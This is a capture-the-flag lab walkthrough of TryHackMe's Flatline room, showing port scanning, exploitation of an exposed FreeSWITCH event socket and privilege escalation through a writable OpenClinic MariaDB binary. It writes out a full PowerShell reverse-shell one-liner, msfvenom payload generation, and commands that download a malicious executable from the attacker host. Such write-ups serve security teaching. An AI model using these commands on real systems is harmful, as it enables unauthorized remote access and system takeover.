THM Writeup – Flatline

THM Writeup – Flatline

Flatline

How low are your morals?

Room: Flatline

Difficulty: Easy

Operating System: Windows

Author: Nekrotic

Add IP address to your hosts file:

echo '10.10.143.60    flatline.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv flatline.thm

PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 128
8021/tcp open  ftp-proxy     syn-ack ttl 128

Get more details about open ports:

nmap -T4 -A -p 3389,8021 flatline.thm

PORT     STATE SERVICE          VERSION
3389/tcp open  ms-wbt-server    Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after:  2022-05-10T16:47:35
|_ssl-date: 2022-03-08T08:01:07+00:00; 0s from scanner time.
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket

3389 – Remote desktop protocol, 8021 – some strange port that runs service named freeswitch.

Let’s first check, if the RDP is vulnerable to BlueKeep – run metasploit and search for bluekeep:

msfconsole
msf5 > search bluekeep

Matching Modules
================

    #  Name                                            Disclosure Date  Rank    Check  Description
    -  ----                                            ---------------  ----    -----  -----------
    0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
    1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free

Select the scanner, configure and run it:

msf5 > use 0
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

    Name             Current Setting  Required  Description
    ----             ---------------  --------  -----------
    RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
    RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
    RDP_DOMAIN                        no        The client domain name to report during connect
    RDP_USER                          no        The username to report during connect, UNSET = random
    RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT            3389             yes       The target port (TCP)
    THREADS          1                yes       The number of concurrent threads (max one per host)


Auxiliary action:

    Name  Description
    ----  -----------
    Scan  Scan for exploitable targets


msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts flatline.thm
rhosts => flatline.thm
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] flatline.thm:3389     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) >

As we can see the RDP is not vulnerable to BlueKeep in our case – otherwise it would be written in the scanner output.

Now find out what is freeswitch – search for freeswitch github:

freeswitch search results

According to README.md:

“FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a versatile software implementation that runs on any commodity hardware. From a Raspberry PI to a multi-core server, FreeSWITCH can unlock the telecommunications potential of any device. Combined with our hosted cloud platform, SignalWire, FreeSWITCH can interconnect with the outside world and scale to any size.”

Try to find a way to exploit it – search for freeswitch exploit:

freeswitch exploit search results

Great, we found an exploit.

Copy the exploit, save it to a file named e.g. exploit.py and make it executable:

nano exploit.py
chmod +x exploit.py

Run the exploit using simple command so we have a proof it works:

root@ip-10-10-237-164:~# python3 exploit.py flatline.thm whoami
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic

The exploit works, so now it’s time to get a reverse shell.

Save this PowerShell command (don’t forget to change IP and Port) to a file named e.g. revshell.ps1:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.237.164',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Setup netcat listener:

nc -lnvp 4242

Run the exploit again like this:

python3 exploit.py flatline.thm "$(cat revshell.ps1)"

And the reverse connection is received:

reverse connection

Find the user flag and read it:

pwd

Path                       
----                       
C:\Program Files\FreeSWITCH


PS C:\Program Files\FreeSWITCH> cd C:\Users
PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:13                Administrator                                                         
d-----       09/11/2021     07:37                Nekrotic                                                              
d-r---       09/11/2021     07:13                Public

PS C:\Users> cd Nekrotic\Desktop
PS C:\Users\Nekrotic\Desktop> dir


    Directory: C:\Users\Nekrotic\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       09/11/2021     07:39             38 root.txt                                                              
-a----       09/11/2021     07:39             38 user.txt

PS C:\Users\Nekrotic\Desktop> more user.txt
[REDACTED]

As we can see there is also root flag, however we don’t have permissions to read it – we have to elevate our privileges to nt\system.

Now let’s do a basic enumeration – see what we can find on the disk:

PS C:\Users\Nekrotic\Desktop> cd C:\
PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       15/09/2018     08:19                PerfLogs                                                              
d-r---       09/11/2021     16:41                Program Files                                                         
d-----       09/11/2021     07:13                Program Files (x86)                                                   
d-----       09/11/2021     07:18                projects                                                              
d-r---       09/11/2021     07:28                Users                                                                 
d-----       09/11/2021     16:47                Windows

Folder projects looks interesting, let’s check it out:

PS C:\> cd projects
PS C:\projects> dir


    Directory: C:\projects


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:29                openclinic                                                            


PS C:\projects> cd openclinic
PS C:\projects\openclinic> dir


    Directory: C:\projects\openclinic


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:29                jdk1.8                                                                
d-----       09/11/2021     07:19                mariadb                                                               
d-----       09/11/2021     07:30                tomcat8                                                               
d-----       09/11/2021     07:29                Uninstall                                                             
-a----       06/04/2021     23:14            250 configureCountry.bat                                                  
-a----       01/07/2021     18:20            167 configureLanguage.bat                                                 
-a----       09/11/2021     07:18         334840 lua5.1.dll                                                            
-a----       07/06/2021     16:58          93696 OpenClinic GA login.exe                                               
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe                                           
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat                                                
-a----       09/11/2021     07:18        1389568 uninstall.exe

Ok, there is another folder openclinic in the projects folder – I guess it is some sort of open-source software.

Find out what openclinic is – search for openclinic:

openclinic search results

We know what it is, now find a way to exploit it – either use google or searchsploit.

By googling openclinic exploit:

openclinic exploit search results

We found a proof-of-concept:

                                # Proof of Concept

1. Generate malicious .exe on attacking machine
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe

2. Setup listener and ensure apache is running on attacking machine
    nc -lvp 4242
    service apache2 start

3. Download malicious .exe on victim machine
    type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe"

4. Overwrite file and copy malicious .exe.
    Renename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak
    Rename downloaded 'mysqld_evil.exe' file in mysqld.exe

5. Restart victim machine

6. Reverse Shell on attacking machine opens
    C:\Windows\system32>whoami
    whoami
    nt authority\system

Follow the PoC:

1. Generate Windows reverse shell (don’t forget to modify IP and Port) and run python http server:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.237.164 LPORT=4444 -f exe > mysqld_evil.exe
python3 -m http.server

2. Open another terminal window and setup netcat listener:

nc -lnvp 4444

3. Go back to terminal with the reverse shell connection, rename mysqld.exe to mysqld.bak and download the malicious .exe file:

PS C:\projects\openclinic> cd mariadb\bin
PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.bak
PS C:\projects\openclinic\mariadb\bin> Invoke-WebRequest -Uri http://10.10.237.164:8000/mysqld_evil.exe -Outfile mysqld.exe

4. Restart target computer:

PS C:\projects\openclinic\mariadb\bin> Restart-Computer

After restart we received a reverse connection:

reverse connection

Check what user are we connected as, go to the Nekrotic’s desktop and read the root flag:

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Nekrotic\Desktop
cd C:\Users\Nekrotic\Desktop

C:\Users\Nekrotic\Desktop>more root.txt
more root.txt
[REDACTED]

Do you like this writeup? Check out other THM Writeups.

Comments are closed.